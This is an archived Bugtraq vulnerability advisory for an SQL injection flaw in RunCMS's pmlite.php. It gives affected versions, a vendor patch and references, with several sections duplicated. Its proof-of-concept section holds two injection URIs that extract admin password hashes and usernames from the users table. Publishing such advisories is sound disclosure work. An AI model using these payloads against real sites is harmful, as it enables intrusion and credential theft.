RunCMS PMLite.PHP SQL Injection Vulnerability
BID:16652
Info
RunCMS PMLite.PHP SQL Injection Vulnerability
| Bugtraq ID: | 16652 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2006 12:00AM |
| Updated: | Feb 18 2006 06:02PM |
| Credit: | Hamid Ebadi is credited with the discovery of this vulnerability. |
| Vulnerable: |
RunCMS RunCMS 1.2 RunCMS RunCMS 1.3.a2 |
| Not Vulnerable: | |
Discussion
RunCMS PMLite.PHP SQL Injection Vulnerability
RunCMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
RunCMS is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
RunCMS PMLite.PHP SQL Injection Vulnerability
An exploit is not required.
The following prooc of concept URI are available:
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
An exploit is not required.
The following prooc of concept URI are available:
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
http://www.example.com/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
Solution / Fix
RunCMS PMLite.PHP SQL Injection Vulnerability
Solution:
A patch is available from the vendor.
RunCMS RunCMS 1.3.a2
RunCMS RunCMS 1.2
Solution:
A patch is available from the vendor.
RunCMS RunCMS 1.3.a2
-
RunCMS FIX1402206-3
http://www.runcms.org/public/modules/downloads/singlefile.php?lid=243
RunCMS RunCMS 1.2
-
RunCMS FIX1402206-3
http://www.runcms.org/public/modules/downloads/singlefile.php?lid=243
References
RunCMS PMLite.PHP SQL Injection Vulnerability
References:
References:
- RUNCMS 1.3a SQL injection (Hamid Ebadi)
- RunCms Homepage (RunCms)